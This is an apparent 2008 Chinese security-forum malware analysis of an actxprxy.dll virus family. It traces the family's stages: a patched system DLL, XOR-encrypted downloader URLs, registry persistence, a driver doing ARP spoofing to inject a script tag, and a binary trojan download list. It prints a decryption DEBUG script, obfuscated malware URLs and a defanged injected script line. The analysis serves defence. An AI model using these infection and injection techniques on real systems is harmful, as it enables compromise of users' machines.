-
-
[原创]走马观花之actxprxy.dll 病毒群
-
发表于: 2008-11-12 15:10
-
原贴见:碰上很诡异的病毒,紧急求助!(瀑泪)
http://bbs.pediy.com/showthread.php?t=76188&tcatid=43
--------------------------------------------------------------------------
粗略地看了看,和几个月前在公司流行的那个很象,应该是新的变种,想看看是否有利用
ms08-67的网马,静态大致地分析了一下,凭记忆写个大概,谬误之处,请您指出。
一、actxprxy.dll
正常的系统文件actxprxy.dll被改写,文件日期、大小不变。
入口地址代码被改为:
.text:71CC12BD 90 nop
.text:71CC12BE E9 82 14 01 00 jmp loc_71CD2745
代码流程:
下载 397K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3E0Y4j5W2)9J5k6h3N6T1N6e0p5J5i4K6u0W2K9h3&6X3L8#2)9J5c8X3N6T1N6g2)9J5k6h3N6A6k6R3`.`. ,保存为wmsetup.dll,执行。
url是xor简单加密的。代码里有诡异的字串 db 'CNNIC#v1',0
二、wmsetup.dll (gbu.gif)
下载 'e48K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8C8i4K6u0W2x3U0x3@1x3e0x3J5i4K6u0W2K9h3&6X3L8#2)9J5c8Y4g2H3k6r3q4@1k6g2)9J5k6h3N6A6k6W2)9J5y4H3`.`. 保存为 temp\qq_update.cab ,临时文件为"qqs????.tmp\qqsF2A8.tmp"。下载成功后加载执行。 url也是xor加密的。
三、 qq_update.cab(update.gif、qqsF2A8.tmp)
和KuNgBiM的“一个被Gdi漏洞利用后的下载者分析”里的是一样的,可以参阅:
http://bbs.pediy.com/showthread.php?t=73991&tcatid=43
大致流程:
1、删除以下注册表项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionShellServiceObjectDelayLoad
JavaView
desktopwin
这是以前版本变种使用的注册表项
2、接着检查是否存在 \Program Files\Messenger 目录,如没有则创建。
建立目录后,病毒把嵌在内部的一块(3e00h 字节)代码生成为 \Program Files \Messenger\msgmr.dll
(其中前900h字节是加密的,先XOR解密...)
3、注册表写入
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA191DE0-AA86-4ED0-4B87-293D48B2AE99}\InprocServer32]
(Default) = "%ProgramFiles%\Messenger\msgmr.dll"
ThreadingModel = "Apartment"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
msnmsg = "{DA191DE0-AA86-4ED0-4B87-293D48B2AE99}"
4、rundll32.exe "\Program Files\Messenger\msgmr.dll",UIMessage
5、生成unxxx.bat删除自身
四、msgmr.dll
说一下,如何得到msgmr.dll
upx 解压wmsetup.dll.
debug wmsetup.dll
-a100
mov si,1110
mov cx,900
xor byte ptr[si],3a
loop 106
int 20
-g
-rcx
3e00
-nmsgmr.dll
-w1110
-q
把嵌在内部的一块(2600h 字节)代码生成为 \windows\Fonts\Framdee.ttf (其中前4D0h字节是加密的,先XOR解密...)
然后执行它...
五、 Framdee.ttf
同样的,利用debug得到。
程序有2个主要模块:_2、_3
_3 流程如下:
解密获得地址,下载:'487K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0#2i4K6u0W2M7$3!0$3K9h3g2@1i4K6u0V1K9$3N6T1i4K6u0W2K9h3&6X3L8#2)9J5c8Y4k6Q4x3X3g2Y4K9h3k6Q4x3U0M7`.
这是个下载列表,病毒据此下载执行几十个木马、病毒、盗号软件。
比较特殊的是一般的病毒下载列表文件大多采用文本格式,这个v.gif是二进制格式,还有自己的文件标志。
简单的说明一下:
文件头部总长18h(24字节),头部 0-1 二个字节是文件标志 ‘1011’,2-3 二字节是木马下载地址的总数(urls) 21h ,接下来4-7 四字节是 urls * 每个地址占用的长度 110h (272) 字节的总长度,程序中对此会进行校验,8-9字节是年份,a-b是月份,c-d是日期,后面难道是时、分、秒...
整理后的木马下载清单:
31fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9I4i4K6u0W2j5$3q4T1
6a9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9J5i4K6u0W2j5$3q4T1
150K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9K6i4K6u0W2j5$3q4T1
7e0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9@1i4K6u0W2j5$3q4T1
fc7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9#2i4K6u0W2j5$3q4T1
b6cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9$3i4K6u0W2j5$3q4T1
816K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9%4i4K6u0W2j5$3q4T1
ad2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9^5i4K6u0W2j5$3q4T1
3a2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0t1%4i4K6u0r3L8X3g2%4i4K6u0r3x3o6l9&6i4K6u0W2j5$3q4T1
155K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3H3i4K6u0W2j5$3q4T1
d13K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3I4i4K6u0W2j5$3q4T1
8c2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3J5i4K6u0W2j5$3q4T1
6a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4y4#2)9J5k6e0t1K6i4K6u0W2x3U0l9#2i4K6u0W2x3U0x3I4i4K6u0r3L8X3g2%4i4K6u0r3x3o6x3K6i4K6u0W2j5$3q4T1
10eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0m8Q4x3X3g2U0j5h3t1`.
0bcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0q4Q4x3X3g2U0j5h3t1`.
93bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0u0Q4x3X3g2U0j5h3t1`.
302K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0y4Q4x3X3g2U0j5h3t1`.
0aaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0c8Q4x3X3g2U0j5h3t1`.
30cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0g2Q4x3X3g2U0j5h3t1`.
038K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0k6Q4x3X3g2U0j5h3t1`.
7fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0N6Q4x3X3g2U0j5h3t1`.
9abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0S2Q4x3X3g2U0j5h3t1`.
116K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0f1^5i4K6u0W2y4e0y4Q4x3X3f1I4x3U0S2Q4x3X3f1I4y4o6m8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3e0W2Q4x3X3g2U0j5h3t1`.
502K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0m8Q4x3X3g2U0j5h3t1`.
6c8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0q4Q4x3X3g2U0j5h3t1`.
638K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0u0Q4x3X3g2U0j5h3t1`.
9a2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0y4Q4x3X3g2U0j5h3t1`.
9c1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0c8Q4x3X3g2U0j5h3t1`.
955K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0g2Q4x3X3g2U0j5h3t1`.
36cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0k6Q4x3X3g2U0j5h3t1`.
6c6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0N6Q4x3X3g2U0j5h3t1`.
f4eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3U0W2Q4x3X3g2U0j5h3t1`.
f63K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0j5H3i4K6u0W2x3e0V1I4i4K6u0W2x3U0t1K6i4K6u0W2x3e0c8Q4x3V1k6F1k6i4N6Q4x3V1j5H3x3K6c8Q4x3X3g2U0j5h3t1`.
接着,解密获得地址:'769K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2K6i4K6u0W2M7$3!0$3K9h3g2@1i4K6u0V1K9$3N6T1i4K6u0W2K9h3&6X3L8#2)9J5c8Y4k6Q4x3X3g2S2M7%4m8Q4x3U0M7`. ,通过 '487K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2K6i4K6u0W2M7$3!0$3K9h3g2@1i4K6u0V1K9$3N6T1i4K6u0W2K9h3&6X3L8#2)9J5c8Y4k6Q4x3X3g2S2M7%4m8Q4x3U0N6Q4x3@1k6S2j5%4c8A6L8$3&6Q4x3@1c8#2M7r3c8S2N6r3g2Q4x3U0k6$3k6i4u0K6K9h3!0F1i4K6y4p5x3l9`.`. 调用 ,下载病毒,保存为 \windows\AppPatch\AcXtrnel.sdb,加载,并执行其中的模块 :DLPUpdate .
病毒建立了注册表项 HKEY_LOCAL_MACHINE, "Software\Adobe",用来保存木马清单。
_2 ,大致是load \windows\AppPatch\AcXtrnel.sdb 获得 DLPTerminate、DLPInit、DLPTerminate、DLPUpdate模块地址。
六、AcXtrnel.sdb
2个主要模块:
1、DLPInit :
解密释放内嵌的代码 ,生成 \windows\AppPatch\AcSpecf.dll ,加载,获得其中的FtpInit、FtpTerminate入口地址。
解密(XOR)得到地址:593K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6@1M7q4)9J5k6h3c8T1z5o6R3@1z5o6t1&6i4K6u0W2K9h3&6X3L8#2)9J5c8X3k6@1M7q4)9J5k6h3q4K6M7q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7c8q4)9&6b7#2!0q4y4q4!0n7z5q4!0n7b7g2!0q4y4g2)9^5c8W2)9^5x3W2!0q4y4W2)9&6y4g2!0n7x3q4!0q4y4q4!0n7b7#2!0m8x3q4!0q4z5g2)9^5x3q4)9&6x3W2!0q4c8W2!0n7b7#2)9^5b7#2!0q4z5q4!0n7x3q4)9^5x3#2!0q4y4#2)9&6y4q4!0m8z5l9`.`. FtpInit。
解密释放内嵌代码,生成 \windows\system32\drivers\eth8023.sys ,修改注册表,然后加载驱动!
读取注册表 HKEY_LOCAL_MACHINE, "Software\\Google" 下的子项 (由DLPUpdate 写入的) 发送ARP欺骗包,劫持HTTP通讯, 在返回的正常页面里插入病毒网页 !
3、DLPUpdate :
解密获得地址 :'86fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4K6M7#2)9J5k6h3c8T1z5o6R3@1z5o6t1&6i4K6u0W2K9h3&6X3L8#2)9J5c8X3y4K6M7#2)9J5k6i4c8^5N6q4)9J5y4#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0o6i4@1f1@1i4@1t1^5i4K6S2n7i4@1f1^5i4@1u0p5i4@1u0p5i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1@1i4@1t1^5i4@1q4m8i4@1f1@1i4@1u0m8i4K6S2o6i4@1f1^5i4@1u0r3i4K6W2n7i4@1f1#2i4K6R3^5i4@1t1$3i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1#2i4K6R3&6i4K6S2p5y4q4!0q4y4g2!0m8c8q4)9&6y4#2!0q4z5q4)9^5b7g2)9^5x3W2!0q4y4W2)9&6y4W2)9^5y4#2!0q4y4q4!0n7b7W2!0n7y4W2!0q4y4W2!0m8x3q4)9^5y4#2!0q4y4g2!0n7c8W2)9&6y4#2!0q4c8W2!0n7b7#2)9&6b7g2)9J5x3f1u0q4N6R3`.`. ,2字节00,之后为xor加密的网马内容。
解密后为:<script language="javascript" SRC="hxxp://y.ads009.info/vip.js"></script> .(
为免误伤,我把http改成hxxp)
病毒校验文件头后把其后的数据写入注册表供ARP攻击使用。
可惜的是y.ads009.info似乎死了,没法看是否有利用ms08-67的网马。 
在以前分析的案例里,.js指向一个.htm,再连接n个网页,利用falshplayer\MS06-014\realplay\联众游戏大厅\暴风影音等漏洞,下载木马,该木马是update.gif复本.
七、AcSpecf.dll
vmware卸了,木抓到样本。印象中主要实现3个模块功能:FtpInit / FtpSend / FtpTerminate。
八、034.cab
...
1、读取\windows\system32\actxprxy.dll,检测是否已中毒,标志为文件起始偏移14H 字节是否为 315 h,偏移16H是否为1011 h,未感染则解读actxprxy.dll,保存程序入口代码,修改程序入口代码,在程序空隙插入病毒代码,使得程序先执行病毒代码再执行原代码,程序文件大小、日 期均不改变。 以目前的代码看,可以利用315H 和 1011H4字节实现该病毒的免疫。
2、释放文件ThunderAdvise.dll到\windows\Downloaded Program Files\ ,修改注册表实现自启动.
3、后释放uninstall.bat 删除自己。
九、n个.cab
... 累死了
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
大虾 我等小菜 实在无奈就GHOST一下吧
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
